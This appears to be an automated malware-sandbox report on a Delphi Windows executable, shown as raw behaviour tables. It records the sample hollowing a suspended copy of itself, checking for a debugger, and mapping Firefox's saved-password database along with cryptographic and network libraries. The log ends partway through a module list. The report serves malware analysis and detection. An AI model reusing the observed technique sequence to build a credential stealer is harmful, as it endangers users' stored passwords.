8de41ace64ef22a1c4755070befebf33082bee0ab6f3a236654937f6d56bfe11 (SHA256)
3838612080743901967.exe
Windows Exe (x86-32)
Created at 2018-04-11 09:22:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: 3838612080743901967.exe
155
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\users\eebsym5\desktop\3838612080743901967.exe |
| Command Line | "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" |
| Initial Working Directory | C:\Users\EEBsYm5\Desktop\ |
| Monitor | Start Time: 00:00:24, Reason: Analysis Target |
| Unmonitor | End Time: 00:01:43, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x978 |
| Parent PID | 0x608 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
97C
0x
990
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| 3838612080743901967.exe | 0x00400000 | 0x0048ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000490000 | 0x00490000 | 0x00590fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c6fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x005d6fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005e6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001210000 | 0x01210000 | 0x0130ffff | Private Memory | - |
|
|
|
- |
| pagefile_0x0000000001310000 | 0x01310000 | 0x01328fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001330000 | 0x01330000 | 0x01330fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001340000 | 0x01340000 | 0x0134ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001350000 | 0x01350000 | 0x0148ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001350000 | 0x01350000 | 0x0142efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001450000 | 0x01450000 | 0x0148ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001490000 | 0x01490000 | 0x014fffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x01500000 | 0x01e2ffff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001e30000 | 0x01e30000 | 0x02222fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x41d33fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x1eb77fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0a230fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x02262fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000041d40000 | 0x41d40000 | 0x41e3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| comctl32.dll | 0x72e20000 | 0x72ea3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dwmapi.dll | 0x74a00000 | 0x74a12fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x74d30000 | 0x74d6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comdlg32.dll | 0x77490000 | 0x7750afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x77690000 | 0x7771efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
Registry (3)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Borland\Locales | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" | os_pid = 0xa4c, creation_flags = CREATE_SUSPENDED, show_window = SW_HIDE |
|
1 |
Thread (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Context | c:\users\eebsym5\desktop\3838612080743901967.exe | os_tid = 0x97c |
|
1 | |
| Set Context | c:\users\eebsym5\desktop\3838612080743901967.exe | os_tid = 0x97c |
|
1 | |
| Resume | c:\users\eebsym5\desktop\3838612080743901967.exe | os_tid = 0x97c |
|
1 |
Module (123)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\Users\EEBsYm5\Desktop\3838612080743901967.ENU | base_address = 0x0 |
|
1 | |
| Load | C:\Users\EEBsYm5\Desktop\3838612080743901967.EN | base_address = 0x0 |
|
1 | |
| Load | shell32 | base_address = 0x767a0000 |
|
1 | |
| Load | user32 | base_address = 0x77ad0000 |
|
1 | |
| Load | advapi32 | base_address = 0x76700000 |
|
1 | |
| Get Handle | c:\users\eebsym5\desktop\3838612080743901967.exe | base_address = 0x400000 |
|
80 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Get Handle | c:\windows\system32\user32.dll | base_address = 0x77ad0000 |
|
3 | |
| Get Handle | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | base_address = 0x72e20000 |
|
1 | |
| Get Handle | T8be7LcIRYaMbqOYuD1TOc | base_address = 0x0 |
|
1 | |
| Get Filename | c:\users\eebsym5\desktop\3838612080743901967.exe | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 261 |
|
1 | |
| Get Filename | c:\users\eebsym5\desktop\3838612080743901967.exe | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 256 |
|
1 | |
| Get Filename | C:\Users\EEBsYm5\Desktop\3838612080743901967.EN | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 261 |
|
1 | |
| Get Filename | Unknown module name | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\3838612080743901967.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDiskFreeSpaceExA, address_out = 0x7625f46f |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x77adc34e |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x77ae67cf |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x77ae34a3 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = AnimateWindow, address_out = 0x77b00620 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitializeFlatSB, address_out = 0x72e5266f |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = UninitializeFlatSB, address_out = 0x72e52542 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollProp, address_out = 0x72e51d29 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollProp, address_out = 0x72e5238d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_EnableScrollBar, address_out = 0x72e520c9 |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_ShowScrollBar, address_out = 0x72e51fdb |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollRange, address_out = 0x72e51e8d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollInfo, address_out = 0x72e51f0f |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_GetScrollPos, address_out = 0x72e51ccd |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollPos, address_out = 0x72e5216d |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollInfo, address_out = 0x72e522be |
|
1 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = FlatSB_SetScrollRange, address_out = 0x72e521e2 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = SetLayeredWindowAttributes, address_out = 0x77ada6dc |
|
1 | |
| Get Address | Unknown module name | function = kthn4CscVMKCre9n955LhUJQdUa60, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = VirtualProtect, address_out = 0x76212341 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1242976 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 1242976 |
|
1 | |
| Map | - | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1310000 |
|
1 | |
| Map | - | process_name = "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" , protection = PAGE_EXECUTE_READWRITE, address_out = 0x400000 |
|
1 | |
| Map | - | process_name = "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" , protection = PAGE_EXECUTE_READWRITE, address_out = 0x140000 |
|
1 | |
| Map | - | process_name = c:\users\eebsym5\desktop\3838612080743901967.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x1330000 |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | 3838612080743901967 | class_name = TApplication, wndproc_parameter = 0 |
|
1 | |
| Set Attribute | 3838612080743901967 | class_name = TApplication, index = 18446744073709551612, new_long = 2691055 |
|
1 |
Keyboard (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = 0, result_out = 4 |
|
1 | |
| Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Get Info | type = KB_LOCALE_ID |
|
1 |
System (16)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 361 milliseconds (0.361 seconds) |
|
13 | |
| Get Time | type = System Time, time = 2018-04-11 09:23:16 (UTC) |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Debug (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Check for Presence | c:\users\eebsym5\desktop\3838612080743901967.exe | - |
|
1 | |
| Check for Presence | c:\users\eebsym5\desktop\3838612080743901967.exe | - |
|
1 |
Process #2: 3838612080743901967.exe
3567
483
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\users\eebsym5\desktop\3838612080743901967.exe |
| Command Line | "C:\Users\EEBsYm5\Desktop\3838612080743901967.exe" |
| Initial Working Directory | C:\Users\EEBsYm5\Desktop\ |
| Monitor | Start Time: 00:01:06, Reason: Child Process |
| Unmonitor | End Time: 00:01:43, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:37 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa4c |
| Parent PID | 0x978 (c:\users\eebsym5\desktop\3838612080743901967.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A50
0x
A58
0x
B04
0x
B20
0x
B28
0x
B30
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00140fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| tzres.dll | 0x001e0000 | 0x001e0fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x002e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000002f0000 | 0x002f0000 | 0x003f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00418fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| rpcss.dll | 0x00420000 | 0x0047bfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000420000 | 0x00420000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004fefff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| oleaccrc.dll | 0x00510000 | 0x00510fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000520000 | 0x00520000 | 0x00521fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| windowsshell.manifest | 0x005f0000 | 0x005f0fff | Memory Mapped File | Readable |
|
|
|
- |
| index.dat | 0x005f0000 | 0x005f7fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x006fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x012fffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001300000 | 0x01300000 | 0x013fffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x01400000 | 0x016cefff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000016d0000 | 0x016d0000 | 0x017d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| signons.sqlite | 0x016d0000 | 0x0171ffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000016d0000 | 0x016d0000 | 0x0178ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000016d0000 | 0x016d0000 | 0x016d1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| index.dat | 0x016e0000 | 0x0170bfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| index.dat | 0x01710000 | 0x0171ffff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001720000 | 0x01720000 | 0x01721fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001730000 | 0x01730000 | 0x01731fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| cversions.1.db | 0x01740000 | 0x01743fff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x01740000 | 0x01743fff | Memory Mapped File | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001a.db | 0x01750000 | 0x0176efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000001770000 | 0x01770000 | 0x01770fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001780000 | 0x01780000 | 0x0178ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001790000 | 0x01790000 | 0x0188ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001890000 | 0x01890000 | 0x0198ffff | Private Memory | Readable, Writable |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x01890000 | 0x018bffff | Memory Mapped File | Readable |
|
|
|
- |
| cversions.2.db | 0x018c0000 | 0x018c3fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000001900000 | 0x01900000 | 0x019fffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001a00000 | 0x01a00000 | 0x01df2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01f00fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e00000 | 0x01e00000 | 0x01efffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x024a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0201ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x02020000 | 0x02085fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000020b0000 | 0x020b0000 | 0x020bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002150000 | 0x02150000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002160000 | 0x02160000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000022c0000 | 0x022c0000 | 0x023c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000024b0000 | 0x024b0000 | 0x025b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| nss3.dll | 0x6ddb0000 | 0x6df64fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ieframe.dll | 0x6df70000 | 0x6e9effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winmm.dll | 0x6f3f0000 | 0x6f421fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x6f850000 | 0x6f855fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msi.dll | 0x6fa60000 | 0x6fc9ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x6ffb0000 | 0x6ffddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| freebl3.dll | 0x701b0000 | 0x701fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| freebl3.dll | 0x701e0000 | 0x7022efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x70200000 | 0x70226fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcp100.dll | 0x70230000 | 0x70298fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mlang.dll | 0x702a0000 | 0x702cdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x71f20000 | 0x71f6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x72890000 | 0x728a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| softokn3.dll | 0x728b0000 | 0x728d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nssdbm3.dll | 0x728c0000 | 0x728d6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mozglue.dll | 0x728e0000 | 0x72901fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x72dd0000 | 0x72e8efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pstorec.dll | 0x72e90000 | 0x72e9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wsock32.dll | 0x73120000 | 0x73126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleacc.dll | 0x73360000 | 0x7339bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x73fe0000 | 0x74017fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x741f0000 | 0x74203fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nlaapi.dll | 0x74240000 | 0x7424ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x74550000 | 0x74570fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| samcli.dll | 0x74780000 | 0x7478efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wkscli.dll | 0x74790000 | 0x7479efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netutils.dll | 0x747a0000 | 0x747a8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| netapi32.dll | 0x747b0000 | 0x747c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winrnr.dll | 0x74880000 | 0x74887fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
